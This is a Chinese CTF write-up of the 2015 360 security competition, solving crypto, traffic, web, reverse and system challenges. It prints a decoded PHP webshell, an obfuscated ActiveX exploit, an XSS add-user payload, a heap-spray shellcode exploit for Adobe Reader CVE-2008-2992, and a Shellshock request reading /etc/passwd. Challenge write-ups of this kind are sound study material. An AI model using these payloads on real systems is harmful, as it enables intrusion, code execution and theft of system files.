第三届360信息安全大赛writeup

第三届360信息安全大赛writeup

@[神秘代码rm -rf /|2015-06-07]

####加密解密10

源姐给了提示,键盘密码。对着字符在键盘上划一下就是一个字母
BHUK,LP ------ N
TGBNHGYT --- B
UYGBN -------- C

####加密解密20

<?php 
eval(gzinflate(base64_decode("pZLdSsNAEIXvBd+hTmOzMXTbFC3UGhtFEANWlLZES5OgvauoIFho2jy7s7PJhMSIF5Kbb2fPzs+Z7O8ZiYAmhLAFS9bQzhUQIboUPECKiUQDMSFMkYZIZt+U5nFkYijB0Kh0KfCcp+5wlh+6YaO2H9VFbW2BNK8U2iJJoiOk9Pek4q/ZBTwG481T4HeD3mC9vH79en67fb+fjScPM38aOMvL6erEn6xePm+uLj7u1i669I9qAucL4ZSDesQWC9WwHlGxkZRpwW9t1ikrDCRwAE87dtvm7EphlRQd3taC6AwpIjJ4A4XFkhcQ81uhbZcw6EN20a67mHPHxX8Qc+YQP7vyvxQJIHNBa9usUBMcck5d1kNqEVmZl9CDkmNNnsLIFV3IKnsVRT4OOCQJdRNq76Pzbw==")));
?>

是一个phpshell,看起来很复杂,其实并不困难。
将每一步的结果依次echo出来,以及字符串拼接的结果相应的替换掉即可。
大概就是这个样子

<?php
$___ = 'base64_decode';
$__ = 'assert';
$__($___("YXNzZXJ0X29wdGlvbnMoQVNTRVJUX1dBUk5JTkcsIDApOw=="));
$__ ($___ ('ZXZhbCgkX1BPU1RbcDRuOV96MV96aDNuOV9qMXVfU2gxX0oxM10p')); 
?>

解开base64
最终的到一个一句话,**eval($_POST[p4n9_z1_zh3n9_j1u_Sh1_J13])**,flag就是一句话密码

####加密解密40

一串全是大写的base64,猜测就是大小写爆破下即可。脚本解决。

import base64
str1 = 'NTU2NJC3ODHHYWJIZ3P4ZWY='
a1 = ['N','n']
a2 = ['T','t']
a3 = ['U','u']
a4 = ['2N','2n']
a5 = ['J','j']
a6 = ['C3O','c3O']
a7 = ['D','d']
a8 = ['H','h']
a9 = ['H','h']
a10 = ["Y",'y']
a11 = ['W','w']
a12 = ['J','j']
a13 = ['I','i']
a14 = ['Z','z']
a15 = ['3P4','3p4']
a16 = ['Z','z']
a17 = ['W','w']
a18 = ['Y=','y=']
for x1 in a1:
    for x2 in a2:
        for x3 in a3:
            for x4 in a4:
                for x5 in a5:
                    for x6 in a6:
                        for x7 in a7:
                            for x8 in a8:
                                for x9 in a9:
                                    for x10 in a10:
                                        for x11 in a11:
                                            for x12 in a12:
                                                for x13 in a13:
                                                    for x14 in a14:
                                                        for x15 in a15:
                                                            for x16 in a16:
                                                                for x17 in a17:
                                                                    for x18 in a18:
                                                                        str1 = x1+x2+x3+x4+x5+x6+x7+x8+x9+x10+x11+x12+x13+x14+x15+x16+x17+x18
                                                                        # print ''.join(str1)
                                                                        str2 = base64.b64decode(str1)
                                                                        flag = 1
                                                                        for k in str2:
                                                                            if not (ord(k)>=33 and ord(k)<=126):
                                                                                flag =0
                                                                                break
                                                                        if flag :
                                                                            print str2

代码写得丑,但是好用。。
挨个拿去试,最终得到flag。

####网络协议20

从流量包中得到poc

<html>
<body>
<object id="mfHQh" classid="clsid:5C2A52BD-2250-4F6B-A4D2-D1D00FCD748C">
<script type="text/javascript">
mfHQh[(unescape(String.fromCharCode((67E0000>>(0>>((0)>>(0)))), 114, (101), ((58914458, 85)+parseInt("110", 3)), (("cGyfp"<289)?("Fy"):11.6e+0001), (202>>(("BfbZkWS"==327)?unescape("lxt"):1)), 80))+(942).toString(34e00)+((12).toString(34)+(14).toString(34E00000)+"s"+(28).toString(((29E+00000<<("OTUpu", 44064652, "Qd", "eRA", "fEgAwtJ", 9362486, 675682, "LLxSXd", 0))<<(0)))))](unescape((("iYbgcQD"<="ZDJbgwjxH")?(981<<(-~-0-1)):(("wVJTgSZum"!=73171390)?String.fromCharCode(99E0000, ((74>>(-~1-1))<<(("qInlSEQAC"!=1971649)?0:715912)), (51E+00000<<0), (((1023==22)?27051:(-~65-1))<<(0>>0)), parseInt("25", 16), ((((~~53)>>(0)))^(-1)+1), ((67E+000<<0)<<0), (~~(~~11.9E+001)), 105E+00000, ("", unescape("OnY"), 110), (((49662263==963834)?"EvBDfGnk":223)-(123>>(0))), (-~11.1E1-1), (((119)^(-1)+1)<<parseInt("0", 2)), ((115<<((0)>>(0)))>>((0)>>(0))), 37, (-~(("qIGAZWko", 53)<<(0))-1), 67e+00, ((959854528>="VUsUeDs")?"GfR".split("").reverse().join(""):101), ((-~((1<<6)+56)-1)<<(656218, 0)), (448>>("knoVd", "", 2)), ((267>>(0))-(-(-159))), ((444>>2)>>(0)), (("UtmHWsEw"!=825704629)?(456e00>>(1<<1)):unescape("Ip")), 101, ((57E00<<0)<<1), (-~((92>>(0))>>(178263, 6994229, 1))-1), (-~101-1), (~~12.0E001), (-(-(~~(("ZmSlaRt"<2448443)?"SIhD":101)))), 32, (((((37>>(0)))^(-1)+1))^(-1)+1), ((53E0000>>0)>>0), ((("icuMppvs"<897081)?45063:((3295257<67659)?957:67))<<0), (-(-(-~37-1))), (((70025<="cJecgz")?"MPLoegx":(-34))+(174>>1)), 67, (49e+00<<parseInt("1", 15)), ((13<<1)+(42975201, "ymv", "", "", 93)), (236>>(("TgKX"<29845901)?454:((3190<="MQfOBSc")?"Dmjel":1))), (98), 112, ("zyEZT".split("").reverse().join(""), 682149, 114), (((232)>>((49>"qBaCavK")?83:1))<<(-~-0-1)), (46), ((351!=82)?10.1E00001:parseInt("24259", 26)), ((48.0E01>>(1<<1))>>((-(("oA"<"Sr")?"onxYT":(0)))^(-1)+1)), (101)):(String.fromCharCode((("jDwp", 109)<<(0)))+"q"+"i")))),0,(((-(-(String.fromCharCode(((1208>="VvPPHwIKa")?353:106), ((4246239<"BtojuE")?309609:70)), parseInt("1610455013", 7), 1)))>>0)>>0));
</script>
</body>
</html>

Google搜索
clsid:5C2A52BD-2250-4F6B-A4D2-D1D00FCD748C
发现是这个Broadwin WebAccess设备的一些poc,发现这个产品现在更名叫Advantech WebAccess 于是去
http://cve.scap.org.cn/cve_list.php?keyword=BroadWin%20WebAccess&action=search&log=1&p=1
http://cve.scap.org.cn/cve_list.php?keyword=Advantech%20Webaccess&action=search&log=1&p=1

发现一共有56个存在的CVE,也并没有存在flag提交的次数限制。。于是手工尝试。。发现为Advantech Webaccess的第四页最后一个,CVE-2014-0773。

####网络协议80

有很多pcap,先挑一个strings,看一下根据题目得知是要提交移动设备国际身份码
于是寻找imei关键字无果,

1433640066005.png

发现存在一个udId,猜测这就是要的码,提取全部的udId

1433640091620.png

发现有重复,去重后尝试分析,请找出使用相同虚拟身份的移动设备国际身份码,猜测用户名或者密码一样的,有可能为相同虚拟身份,发现一组密码相同的
udId分别为353627055435880和352315050191630,提交353627055435880正确。

1433640163615.png

####Web安全10

用c32打开图片,图片末尾有串base64。解开,得到ctf_360_flag
但是并没有什么,后来小水滴提示,mac下的文件。访问
http://isg.campus.360.cn/web1/ctf_360_flag/.DC_Store
得到flag

####Web安全20

找回密码,F12可以改找回的邮箱,有个send的,返回有个code,猜测是验证码,提交无果,得到提示swp临时文件泄漏源码以及源码里的部分check.php注释,得到check.php的部分代码。搜索到ph牛的https://www.leavesongs.com/PENETRATION/findpwd-funny-logic-vul.html
于是将code设置为000000000a,成功得到flag。

####Web安全30

c32打开图片,末尾有一串ascii字符,

--.  ..  ..-.  ---..  ----.  .-  ;..<..--..  .--.  ....  .--.   $.-   = "-----  .-.-.-  .----  ";$-...   = $_--.  .  -  [.----.  -...  .----.  ];..  ..-.  ($-...   -.-.--  = .----.  .----.  ){    ..  ..-.   (..  ...  _.-  .-.  .-.  .-  -.--  ($-...  )){        .  -.-.  ....  ---   "-.  ---   -.-  .  -.--  -.-.--  ";        .  -..-  ..  -  ;    }.  .-..  ...  .  ..  ..-.  (-.-.--  ..  ...  _-.  ..-  --  .  .-.  ..  -.-.  ($-...  )){       $-.-.   = (..  -.  -  )(($.-   + $-...  ) * .----  -----  );        ..  ..-.   ($-.-.   == "---..  " && $-...  [.----  -----  ] == ..-.  .-  .-..  ...  .  ){            .  -.-.  ....  ---   "..-.  .-..  .-  --.  ";        }.  .-..  ...  .  {            .  -.-.  ....  ---   "-.  ---   -.-  .  -.--  -.-.--  ";            .  -..-  ..  -  ;        }    }.  .-..  ...  .  {        .  -.-.  ....  ---   "-.  ---   -.-  .  -.--  -.-.--  ";    }}.  .-..  ...  .  {    .  -.-.  ....  ---   "-.  ---   -.-  .  -.--  -.-.--  ";}..--..  >

很像php代码。
看着又像有摩斯密码。用摩斯密码解密后,得到php代码。

<?php 
    $a = "0.1";
    $b = $get['b'];
    if  ($b != ''  )
    {    
        if  (is_array($b))
        {
            echo  "NOKEY?";
            EXIT;    
        } 
        elseif (!is_numeric ($b))
        {       
            $c  = (int)(($a + $b) * 10 );        
            if ($c == "8" && $b[10] == false )
            {
                echo "FLAG";        
            }
            else
            {
                echo  "NOKEY? ";     
                exit;        
            }    
        }
        else 
        {
            echo  "NOKEY?";    }
        }
    else 
    {
        echo "NOKEY?";
    } 
?>

一个简单的php绕过的trick
直接访问isg.campus.360.cn/web3?b=0.71e0a
得到flag。

####Web安全160

是一个登陆框,一开始以为是个注入点。但尝试无果。提示中写到爆破会被后台记录,又猜测是ip处可以伪造,然后xss?
结果手动撸了几次后发现,居然是在账号处存在xss。

1433640635648.png

如图
但是cookie并不能拿来伪造。
最终尝试用xhr获取网页的源代码。
阅读了页面源代码后,发现有个添加账号的接口,
于是继续用xhr调用该接口,添加账号。

var xhr = window.XMLHttpRequest? new XMLHttpRequest() : window.ActiveXObject ? new ActiveXObject("Microsoft.XMLHTTP") : new XMLHttpRequest();
xhr.open("POST", "/web5/adduser", true);
xhr.send(“name=th1nk&pass=th1nk111&submit=ok");

使用用户名th1nk,密码th1nk111登陆,登陆上就得到了flag。

逆向分析80

PDFStreamDumper分析出漏洞编号
Exploit CVE-2008-2992 Date:11.4.08 v8.1.2 - util.printf - found in stream: 6

提取出poc


    var FPjQCsjtdonfxZpbyesDvmeaJODjYqwSRZaNVxBbHKwQPiKwAHsrLOIDlFsDoMExuKqqqiARD = unescape("%u0de1%ua8ba%u9fb9%ue08c%u4978%ub3bb%ufd69%ue310%u3735%ubfb2%u1415%u1c77%ud683%ufc0a%u6b27%ud4d0%u6797%ub62c%ud50b%u4f2d%u0c4b%u98b0%u3f1d%u4647%u8d43%u3499%u41be%u727a%ud303%ue0d1%u7874%u0477%ub893%u8790%uc1c7%u73e1%u4871%u8db3%u759f%u1c7f%u9bb9%u924f%u9634%u2593%u2db7%u3770%u11a9%u7ad6%u4249%u27be%ufd18%u15b0%u247d%u2cbb%uf533%ub697%u467e%u4e79%u7c43%u4a76%u900c%uf888%u05ba%ub499%u1491%u1d98%u0d3d%ufc2a%u7ba8%ud43b%u3c40%u20b8%u2fe3%u6641%ueb86%u043f%u80bf%u35d5%ub2b1%uf923%u4b67%u47b5%ue229%u7672%u4f7a%u09b4%u70eb%u6775%u05b0%u347f%uf785%u3fe1%u3827%uc0ff%u39f9%u30fc%u74e0%u1215%u24d5%u9f41%u257c%u910c%u488d%u78be%ue322%ud621%ua949%u2cb9%u81a8%ub6f8%u464a%ub5b2%u6697%u3cbb%u9042%ub392%ub804%u354b%u9914%ub71d%u2f47%u7e79%u960d%u2b43%u40fd%u772d%u1a7b%u02e2%ubad4%u7193%u1c73%u379b%ubf98%u7db1%u4e3d%uf51b%ud208%u7ae2%u7f75%u7c7b%u4373%ue184%u2d70%u9296%u0c99%u3a42%u66f9%u7e4b%u741d%ud131%u20eb%u3bf5%ua8fd%u1148%uc6fe%ud5c0%u7298%uf70b%u71e0%u7876%u7949%ub314%ub4b2%u4024%u89b7%u15f8%ub0bf%u8d41%u049f%ube0d%ub6a9%ud63a%u03b5%ub8fc%ue319%u7d77%u023c%ub1d4%ubb37%u3f34%u1c46%u9767%u3d4e%u4f93%u252f%u2791%ub935%u9b2c%u4a47%u9005%u88ba%u7ce3%u3875%u73d4%u9824%ub3b7%ue086%ub64e%ubb27%ub514%u71a8%ua94a%u0c7a%ufd1b%u709b%ue239%u9205%u7f4b%u2d1d%u72b0%u673c%u74bf%u3d78%u419f%u9735%u762f%u4347%u4f66%ud585%u91b9%u8d48%ub442%ueb22%u3f1c%u2577%ud613%u407e%u9099%uf52a%u04b8%ubeb1%ub246%u7dba%u340d%u7937%u9315%u0a96%u7bfc%u8749%u83f9%u2ce1%uf832%u717c%u7f7d%u9f3f%ube04%ub9b4%uc118%u7ee2%u9627%u2378%u70d4%ud06b%u73f8%u3175%u4fe0%u7691%ub335%u30bb%u8dfc%u3d72%u66bf%u9937%u3c92%uf92b%u4e05%u7ab1%u417b%ua847%u2cb8%u2443%u90b6%u4b9b%ub2a9%u3442%u4874%u6914%u28fd%u40e3%ue121%u671c%uba49%ud28c%uebd3%u840d%ub5f5%ub0b7%u1a77%u98d6%u7993%u7346%u7825%ue301%u772d%u7515%u971d%ud580%u4a7f%u0c74%u2f71%u76b6%ud612%u7b91%u793d%u3f47%u3c7e%u417d%u7aba%ue110%u6734%u0d7c%u8db3%u70bf%ue209%u811d%u24eb%u93be%u05e0%uf598%ubb96%u72a8%u350c%u0448%u9f97%u4643%ub0fd%u292d%ud5f6%ub5d4%u4eb9%u2f92%u9b4a%u4fb4%u3366%ub8f8%u49a9%u272c%ub24b%u99b1%u421c%ub737%u4015%u2514%uf908%ufc90%ueebe%u28ba%ud9b3%ud9cf%u2474%u58f4%uc931%u4db1%u7031%u8315%ufce8%u7003%ue211%u631b%u28c3%ue03a%ubb30%udb8d%u348b%u12dc%u318f%u956f%u30db%u5e83%ua0ad%u2610%u525a%u8758%u52d1%u889c%ueffd%u4f2f%udeff%u9130%u6b9f%u76a2%ue744%u4b7f%ua30f%ucb57%ua60e%u612c%ubd09%u5668%u2a28%ua26f%u2763%u405b%ud972%ua992%ue544%uf928%u2523%u05a4%u69ed%u0b49%u9e2a%u30a5%u45c8%u326d%u0dd1%u9837%uf910%u6ba1%ub61e%u36a6%u4903%u4d53%uc23f%ubaa2%u90c9%u2680%udbab%u5e7a%u0802%ubaf3%u72dd%ucb6b%u7c90%u8187%u1ec4%ud9a8%ua8ea%u2213%ud5ae%uc843%uaea3%u296f%u5916%uce01%u6669%u7494%uf19e%u1aca%u40be%ud07a%u6c8c%u7e1e%u0384%u0cbb%u3f56%uadcb%ub5b2%uab42%u36ed%u3001%u0b9b%u83f9%u2933%u4fb4%u32c4%ue262%u1523%ufd95%uc24b%u6c06%u33ec%u1cb0%u406d%ub529%uc91f%u30dd%u4a88%ud572%u7c2f%ua157%u5aec%u3b69%ucbef%u6345%u2bd0%ua5cd%u4d21%ua268%ub525%u0211%uf3ce%u5ae7%u946d%uae3f%u0648%ue957%ufec8%u619f%u9b35%u46ed%u5b2d%ucd73%uf394%u3d2c%u3385%u1dba%u5b30%u364f%uc6a9%ufcd6%uc01c%u4da0%ufb7b%uac39%u29b2%u7c6b%u9fe4%u5274%ue037%uacda%ue86d");
    var zYKJFPGhDPdJyrbAxRpcQfDImAPIplsgOzCCcIqxADQEwmGLZRS ="";
    for (iQVeXTShSXwvQktjtpkoUTHbmcLIqFtOcJvMMfOdAQqZfCLlaHyzLUV=128;iQVeXTShSXwvQktjtpkoUTHbmcLIqFtOcJvMMfOdAQqZfCLlaHyzLUV>=0;--iQVeXTShSXwvQktjtpkoUTHbmcLIqFtOcJvMMfOdAQqZfCLlaHyzLUV) zYKJFPGhDPdJyrbAxRpcQfDImAPIplsgOzCCcIqxADQEwmGLZRS += unescape("%ub14f%u47b6");
    bUQrgSIqvBTMIcSVloEgDsmSFJKzNOOhLayThJddFfMEEsvjJrEqQAHOfcPusGgNnZGszHFXQKezzaUxnaXtoyfluqBJddjV = zYKJFPGhDPdJyrbAxRpcQfDImAPIplsgOzCCcIqxADQEwmGLZRS + FPjQCsjtdonfxZpbyesDvmeaJODjYqwSRZaNVxBbHKwQPiKwAHsrLOIDlFsDoMExuKqqqiARD;
    CnPTbiKLEkFFfKJjHhPQucfuMGjCOvAAIGtNjGtXTnZoOJtTZlMYKDofZpRcNBdxCIypFgKFVghIJdqUHmZEpgUHsMK = unescape("%ub14f%u47b6");
    TLaqiOXLRiPnHZKwUfoXkIOROzZFxsumuRRjbxWStcJBZuwdvhflKZKtOtoZQcDNeffLmbdnBgOSdAYCXv = 20;
    ECRRsmroCTdUbKec = TLaqiOXLRiPnHZKwUfoXkIOROzZFxsumuRRjbxWStcJBZuwdvhflKZKtOtoZQcDNeffLmbdnBgOSdAYCXv+bUQrgSIqvBTMIcSVloEgDsmSFJKzNOOhLayThJddFfMEEsvjJrEqQAHOfcPusGgNnZGszHFXQKezzaUxnaXtoyfluqBJddjV.length
    while (CnPTbiKLEkFFfKJjHhPQucfuMGjCOvAAIGtNjGtXTnZoOJtTZlMYKDofZpRcNBdxCIypFgKFVghIJdqUHmZEpgUHsMK.length<ECRRsmroCTdUbKec) CnPTbiKLEkFFfKJjHhPQucfuMGjCOvAAIGtNjGtXTnZoOJtTZlMYKDofZpRcNBdxCIypFgKFVghIJdqUHmZEpgUHsMK+=CnPTbiKLEkFFfKJjHhPQucfuMGjCOvAAIGtNjGtXTnZoOJtTZlMYKDofZpRcNBdxCIypFgKFVghIJdqUHmZEpgUHsMK;
    ssmVTFzQhXCzpRQWatxEl = CnPTbiKLEkFFfKJjHhPQucfuMGjCOvAAIGtNjGtXTnZoOJtTZlMYKDofZpRcNBdxCIypFgKFVghIJdqUHmZEpgUHsMK.substring(0, ECRRsmroCTdUbKec);
    yruXtuLATsVgRHfINgmhqtLRsIsaTkOVZcFnuaBhLpfmiLOZuLHjIBOFTikLVcTswjqLQQkqpYWtktNuhdHNuKjFgjCqNTYGG = CnPTbiKLEkFFfKJjHhPQucfuMGjCOvAAIGtNjGtXTnZoOJtTZlMYKDofZpRcNBdxCIypFgKFVghIJdqUHmZEpgUHsMK.substring(0, CnPTbiKLEkFFfKJjHhPQucfuMGjCOvAAIGtNjGtXTnZoOJtTZlMYKDofZpRcNBdxCIypFgKFVghIJdqUHmZEpgUHsMK.length-ECRRsmroCTdUbKec);
    while(yruXtuLATsVgRHfINgmhqtLRsIsaTkOVZcFnuaBhLpfmiLOZuLHjIBOFTikLVcTswjqLQQkqpYWtktNuhdHNuKjFgjCqNTYGG.length+ECRRsmroCTdUbKec < 0x40000) yruXtuLATsVgRHfINgmhqtLRsIsaTkOVZcFnuaBhLpfmiLOZuLHjIBOFTikLVcTswjqLQQkqpYWtktNuhdHNuKjFgjCqNTYGG = yruXtuLATsVgRHfINgmhqtLRsIsaTkOVZcFnuaBhLpfmiLOZuLHjIBOFTikLVcTswjqLQQkqpYWtktNuhdHNuKjFgjCqNTYGG+yruXtuLATsVgRHfINgmhqtLRsIsaTkOVZcFnuaBhLpfmiLOZuLHjIBOFTikLVcTswjqLQQkqpYWtktNuhdHNuKjFgjCqNTYGG+ssmVTFzQhXCzpRQWatxEl;
    B = new Array();
    for (OtqwAabDCukgckmkSsszrelXkzTzqQiYcGawWOSrHkbxyUmuNOccVEOGVPDNTeCpKjkPCAfdtpIDAnzhVANxiGYHeVAFqIIhm=0;OtqwAabDCukgckmkSsszrelXkzTzqQiYcGawWOSrHkbxyUmuNOccVEOGVPDNTeCpKjkPCAfdtpIDAnzhVANxiGYHeVAFqIIhm<1450;OtqwAabDCukgckmkSsszrelXkzTzqQiYcGawWOSrHkbxyUmuNOccVEOGVPDNTeCpKjkPCAfdtpIDAnzhVANxiGYHeVAFqIIhm++) B[OtqwAabDCukgckmkSsszrelXkzTzqQiYcGawWOSrHkbxyUmuNOccVEOGVPDNTeCpKjkPCAfdtpIDAnzhVANxiGYHeVAFqIIhm] = yruXtuLATsVgRHfINgmhqtLRsIsaTkOVZcFnuaBhLpfmiLOZuLHjIBOFTikLVcTswjqLQQkqpYWtktNuhdHNuKjFgjCqNTYGG + bUQrgSIqvBTMIcSVloEgDsmSFJKzNOOhLayThJddFfMEEsvjJrEqQAHOfcPusGgNnZGszHFXQKezzaUxnaXtoyfluqBJddjV;
    util.printf("%45000.45000f", 0);
          >

下载8.1.2版本运行即可
1433641116101.png

####系统安全10

get_asn_header(‘0');
p = “\x30\x22”
get_object((char *)&version, 2);
p += “\x02\x01”
if ( version == 2 )
p += “\x02”
get_object(community_name, 4); // overflow community_name
**p += “\x04\xff”+”\x00”24* p += “\x41\x0a\x41\x40\x00”

####系统安全20

burp构造如下包

GET /os2 HTTP/1.1
Host: isg.campus.360.cn
User-Agent: () { :;}; echo \$(</etc/passwd)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://isg.campus.360.cn/
Cookie: __guid=67796994.1202642768474584600.1433121630729.481; PHPSESSID=ne9d10moabsrh9uh5h1o5qvuo7
Connection: keep-alive
tagged by none  

Comment Closed.

© 2014 ::L Team::